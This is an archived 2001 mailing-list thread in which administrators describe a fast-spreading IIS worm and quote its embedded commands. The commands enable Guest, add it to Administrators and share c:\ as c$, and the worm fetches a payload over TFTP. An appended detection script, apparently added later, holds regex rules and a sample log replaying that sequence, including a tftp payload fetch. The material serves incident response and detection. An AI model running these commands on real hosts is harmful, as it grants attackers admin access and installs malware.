We've blocked 69/udp at our internal and border routers both incoming and
outgoing. Be careful with your private networks. Our tech support department
contracted this bug by opening a web page of an infected customer in
response to a complaint about performance.

Dave Sill
Server Admin
Socket Internet Services
davidsat_private

On Tuesday 18 September 2001 15:10, you wrote:
> YES
>
> --- Dave Sill <davidsat_private> wrote:
> > You say that the worm gets a payload by tftp... Is it using port 69?
> >
> > Thanks,
> >
> > Dave Sill
> > Server Admin
> > Socket Internet Services
> > davidsat_private
> >
> > Is the worm
> >
> > On Tuesday 18 September 2001 10:47, you wrote:
> > > Hi all!
> > >
> > > We've all just been hit by a VERY aggressive worm/virus.
> > > Quick analysis indicates that it propagates itself in
> > > a number of different ways:
> > >
> > > Through use of IIS UNICODE directory traversal coupled
> > > with the recent IIS .dll privilege escalation attack.
> > > It uses SMB/CIFS and TFTP to get the worm payload.
> > >
> > > Through MAPI mails (probably to all of addressbook).
> > > Other ways of spreading may be possible, but we haven't
> > > yet had the time to properly analyse the worm/virus.
> > > It seems to share "c:\" via SMB/CIFS as "c$" and
> > > the worm/virus also adds the "Guest" user and "Guests"
> > > group to the local "Administrators" group....
> > >
> > > Interesting strings in binary:
> > >
> > > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
> > > SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
> > > share c$=c:\
> > > user guest ""
> > > localgroup Administrators guest /add
> > > localgroup Guests guest /add
> > > user guest /active
> > > open
> > > user guest /add
> > > net
> > >
> > > More info as we come upon it.....
> > >
> > > /olle

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
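The quoted analysis lists the local "net" commands the worm issues (enabling Guest, adding it to Administrators and Guests, sharing c:\ as c$) and notes that the payload is fetched over TFTP. The script below is an added example, not code from the thread or from any of its authors: it turns those strings into host-based detection rules and runs them over a constructed process-creation log. The log format (timestamp|host|command line), the host names and the IP address are all made up for the example, and the rule that flags any tftp client invocation is a coarse heuristic I am assuming, since the thread does not give the exact tftp command line.

```python
import re

# Indicator rules derived from the "net" strings quoted in the thread.
# Each entry: (rule name, regex applied to a normalised command line).
# "tftp_client_run" is an assumption added here: the thread only says the
# payload arrives via TFTP, so any tftp client start is treated as suspect.
INDICATORS = [
    ("guest_created",        re.compile(r'^net1?\s+user\s+guest\s+/add(?:\s|$)')),
    ("guest_enabled",        re.compile(r'^net1?\s+user\s+guest\s+/active(?::yes)?(?:\s|$)')),
    ("guest_blank_password", re.compile(r'^net1?\s+user\s+guest\s+""(?:\s|$)')),
    ("guest_in_admins",      re.compile(r'^net1?\s+localgroup\s+administrators\s+guest\s+/add(?:\s|$)')),
    ("guest_in_guests",      re.compile(r'^net1?\s+localgroup\s+guests\s+guest\s+/add(?:\s|$)')),
    ("c_drive_shared",       re.compile(r'^net1?\s+share\s+c\$=c:\\')),
    ("tftp_client_run",      re.compile(r'^tftp(?:\s|$)')),
]

# Constructed sample log: one process start per line, fields separated by "|".
# ws-017 shows the sequence from the thread; ws-022 is benign background noise.
SAMPLE_LOG = """\
2001-09-18T10:41:07|ws-017|"C:\\WINNT\\system32\\net.exe" user guest /active:yes
2001-09-18T10:41:08|ws-017|net localgroup Administrators guest /add
2001-09-18T10:41:08|ws-017|net localgroup Guests guest /add
2001-09-18T10:41:09|ws-017|net share c$=c:\\
2001-09-18T10:41:11|ws-017|tftp -i 10.0.0.23 get payload.bin
2001-09-18T10:42:00|ws-022|net use Z: \\\\fileserver\\public
2001-09-18T10:42:30|ws-022|notepad.exe C:\\temp\\notes.txt
"""


def normalise(cmdline: str) -> str:
    """Lower-case the command line and reduce the program token to its bare
    name: a full path and a trailing ".exe" are stripped, so
    "C:\\WINNT\\system32\\NET.EXE user ..." becomes "net user ...".
    Program paths containing spaces are not handled (kept simple on purpose)."""
    tokens = cmdline.strip().split()
    if not tokens:
        return ""
    prog = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if prog.endswith(".exe"):
        prog = prog[:-4]
    rest = " ".join(tokens[1:]).lower()
    return (prog + " " + rest).strip()


def scan(log_text: str):
    """Return a list of (timestamp, host, rule_name) for every indicator hit."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        ts, host, cmdline = parts
        norm = normalise(cmdline)
        for name, pattern in INDICATORS:
            if pattern.search(norm):
                hits.append((ts, host, name))
    return hits


def hosts_to_isolate(hits, threshold: int = 2):
    """Hosts that triggered at least `threshold` distinct rules. A single hit
    (e.g. an admin running "net share") is noise; several of these commands in
    sequence on one host matches the behaviour described in the thread."""
    rules_by_host = {}
    for _, host, name in hits:
        rules_by_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in rules_by_host.items() if len(names) >= threshold)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ts, host, name in found:
        print(f"{ts} {host} {name}")
    print("isolate:", hosts_to_isolate(found))
```

The rules key on the normalised command line rather than the raw one so that full paths, mixed case and the `net1` alias do not evade them; the per-host threshold keeps a lone legitimate `net share` from paging anyone. Pair this with the network-side control from the top of the thread (blocking 69/udp at the border and between internal segments) so that the tftp fetch fails even on a host the rules have not yet caught.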
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:42:26 PDT